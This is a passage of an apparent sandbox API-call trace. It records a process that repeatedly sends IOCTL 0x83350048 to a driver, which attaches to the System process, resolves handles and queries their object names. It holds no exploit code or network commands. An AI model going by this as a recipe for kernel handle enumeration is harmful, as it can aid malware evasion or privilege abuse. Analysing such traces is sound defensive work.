| out: Process=0xfffff880052b3558) returned 0x0 [0199.162] PsAcquireProcessExitSynchronization () returned 0x0 [0199.162] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.162] ObReferenceObjectByHandle (in: Handle=0xffffffff80000334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800375a940, HandleInformation=0x0) returned 0x0 [0199.162] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.162] PsReleaseProcessExitSynchronization () returned 0x2 [0199.162] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.162] ObQueryNameString (in: Object=0xfffffa800375a940, ObjectNameInfo=0xfffffa8003152044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003152044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.162] ObfDereferenceObject (Object=0xfffffa800375a940) returned 0x2 [0199.162] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.163] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.163] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x13c, lpOverlapped=0x0) returned 1 [0199.163] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.163] PsAcquireProcessExitSynchronization () returned 0x0 [0199.163] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.163] ObReferenceObjectByHandle (in: Handle=0xffffffff80000338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800375ba90, HandleInformation=0x0) returned 0x0 [0199.163] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.163] PsReleaseProcessExitSynchronization () returned 0x2 [0199.163] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.163] ObQueryNameString (in: Object=0xfffffa800375ba90, ObjectNameInfo=0xfffffa8003153044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003153044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.163] ObfDereferenceObject (Object=0xfffffa800375ba90) returned 0x2 [0199.163] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.164] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.164] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0199.164] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.164] PsAcquireProcessExitSynchronization () returned 0x0 [0199.164] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.164] ObReferenceObjectByHandle (in: Handle=0xffffffff80000340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800375b940, HandleInformation=0x0) returned 0x0 [0199.164] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.164] PsReleaseProcessExitSynchronization () returned 0x2 [0199.164] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.164] ObQueryNameString (in: Object=0xfffffa800375b940, ObjectNameInfo=0xfffffa8003154044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003154044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.164] ObfDereferenceObject (Object=0xfffffa800375b940) returned 0x1 [0199.164] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.164] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.165] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0199.165] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.165] PsAcquireProcessExitSynchronization () returned 0x0 [0199.165] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.165] ObReferenceObjectByHandle (in: Handle=0xffffffff80000344, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800375c980, HandleInformation=0x0) returned 0x0 [0199.165] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.165] PsReleaseProcessExitSynchronization () returned 0x2 [0199.165] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.165] ObQueryNameString (in: Object=0xfffffa800375c980, ObjectNameInfo=0xfffffa8003155044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003155044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.165] ObfDereferenceObject (Object=0xfffffa800375c980) returned 0x2 [0199.165] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.165] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.165] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.165] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0199.166] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.166] PsAcquireProcessExitSynchronization () returned 0x0 [0199.166] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.166] ObReferenceObjectByHandle (in: Handle=0xffffffff80000388, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800386ba30, HandleInformation=0x0) returned 0x0 [0199.166] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.166] PsReleaseProcessExitSynchronization () returned 0x2 [0199.166] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.166] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003156044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003156044, ReturnLength=0xfffff880052b3508) returned 0x0 [0199.166] ObfDereferenceObject (Object=0xfffffa800386ba30) returned 0x1 [0199.166] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.166] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.166] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.166] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x5e, lpOverlapped=0x0) returned 1 [0199.166] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.166] PsAcquireProcessExitSynchronization () returned 0x0 [0199.167] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.167] ObReferenceObjectByHandle (in: Handle=0xffffffff8000038c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800386ebf0, HandleInformation=0x0) returned 0x0 [0199.167] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.167] PsReleaseProcessExitSynchronization () returned 0x2 [0199.167] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.167] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003157044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003157044, ReturnLength=0xfffff880052b3508) returned 0x0 [0199.167] ObfDereferenceObject (Object=0xfffffa800386ebf0) returned 0x1 [0199.167] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.167] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.167] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.167] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0199.167] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.167] PsAcquireProcessExitSynchronization () returned 0x0 [0199.167] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.168] ObReferenceObjectByHandle (in: Handle=0xffffffff80000390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800386e890, HandleInformation=0x0) returned 0x0 [0199.168] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.168] PsReleaseProcessExitSynchronization () returned 0x2 [0199.168] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.168] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003158044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003158044, ReturnLength=0xfffff880052b3508) returned 0x0 [0199.168] ObfDereferenceObject (Object=0xfffffa800386e890) returned 0x1 [0199.168] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.168] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.168] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.168] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0199.168] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.169] PsAcquireProcessExitSynchronization () returned 0x0 [0199.169] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.169] ObReferenceObjectByHandle (in: Handle=0xffffffff80000394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003867f20, HandleInformation=0x0) returned 0x0 [0199.169] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.169] PsReleaseProcessExitSynchronization () returned 0x2 [0199.169] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.169] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003159044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003159044, ReturnLength=0xfffff880052b3508) returned 0x0 [0199.169] ObfDereferenceObject (Object=0xfffffa8003867f20) returned 0x4 [0199.169] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.169] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.169] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.169] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0199.170] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.170] PsAcquireProcessExitSynchronization () returned 0x0 [0199.170] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.170] ObReferenceObjectByHandle (in: Handle=0xffffffff80000398, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003868880, HandleInformation=0x0) returned 0x0 [0199.170] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.170] PsReleaseProcessExitSynchronization () returned 0x2 [0199.170] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.170] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0199.170] ObfDereferenceObject (Object=0xfffffa8003868880) returned 0x1 [0199.170] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.170] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.170] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.170] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x72, lpOverlapped=0x0) returned 1 [0199.170] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.170] PsAcquireProcessExitSynchronization () returned 0x0 [0199.170] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.171] ObReferenceObjectByHandle (in: Handle=0xffffffff8000039c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003870b20, HandleInformation=0x0) returned 0x0 [0199.171] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.171] PsReleaseProcessExitSynchronization () returned 0x2 [0199.171] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.171] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0199.171] ObfDereferenceObject (Object=0xfffffa8003870b20) returned 0x1 [0199.171] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.171] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.171] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.171] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0199.171] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.171] PsAcquireProcessExitSynchronization () returned 0x0 [0199.171] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.171] ObReferenceObjectByHandle (in: Handle=0xffffffff800003a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003870c70, HandleInformation=0x0) returned 0x0 [0199.172] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.172] PsReleaseProcessExitSynchronization () returned 0x2 [0199.172] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.172] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0199.172] ObfDereferenceObject (Object=0xfffffa8003870c70) returned 0x1 [0199.172] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.172] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.172] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.172] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.172] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.172] PsAcquireProcessExitSynchronization () returned 0x0 [0199.172] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.172] ObReferenceObjectByHandle (in: Handle=0xffffffff800003bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038d92b0, HandleInformation=0x0) returned 0x0 [0199.172] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.173] PsReleaseProcessExitSynchronization () returned 0x2 [0199.173] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.173] ObQueryNameString (in: Object=0xfffffa80038d92b0, ObjectNameInfo=0xfffffa800315e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.173] ObfDereferenceObject (Object=0xfffffa80038d92b0) returned 0x2 [0199.173] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.173] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.173] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.173] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xde, lpOverlapped=0x0) returned 1 [0199.173] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.173] PsAcquireProcessExitSynchronization () returned 0x0 [0199.173] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.173] ObReferenceObjectByHandle (in: Handle=0xffffffff800003c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039047b0, HandleInformation=0x0) returned 0x0 [0199.173] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.174] PsReleaseProcessExitSynchronization () returned 0x2 [0199.174] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.174] ObQueryNameString (in: Object=0xfffffa80039047b0, ObjectNameInfo=0xfffffa8003160044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003160044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.174] ObfDereferenceObject (Object=0xfffffa80039047b0) returned 0x2 [0199.174] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.174] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.174] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.174] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0199.174] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.174] PsAcquireProcessExitSynchronization () returned 0x0 [0199.174] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.175] ObReferenceObjectByHandle (in: Handle=0xffffffff800003d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028e0b70, HandleInformation=0x0) returned 0x0 [0199.175] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.175] PsReleaseProcessExitSynchronization () returned 0x2 [0199.175] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.175] ObQueryNameString (in: Object=0xfffffa80028e0b70, ObjectNameInfo=0xfffffa8003163044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003163044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.175] ObfDereferenceObject (Object=0xfffffa80028e0b70) returned 0x1 [0199.175] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.175] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.175] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.175] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.175] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.176] PsAcquireProcessExitSynchronization () returned 0x0 [0199.176] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.176] ObReferenceObjectByHandle (in: Handle=0xffffffff800003d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034bdf20, HandleInformation=0x0) returned 0x0 [0199.176] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.176] PsReleaseProcessExitSynchronization () returned 0x2 [0199.176] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.176] ObQueryNameString (in: Object=0xfffffa80034bdf20, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.176] ObfDereferenceObject (Object=0xfffffa80034bdf20) returned 0x2 [0199.176] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.176] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.176] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.176] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0199.176] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.176] PsAcquireProcessExitSynchronization () returned 0x0 [0199.176] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.177] ObReferenceObjectByHandle (in: Handle=0xffffffff800003dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e64f20, HandleInformation=0x0) returned 0x0 [0199.177] 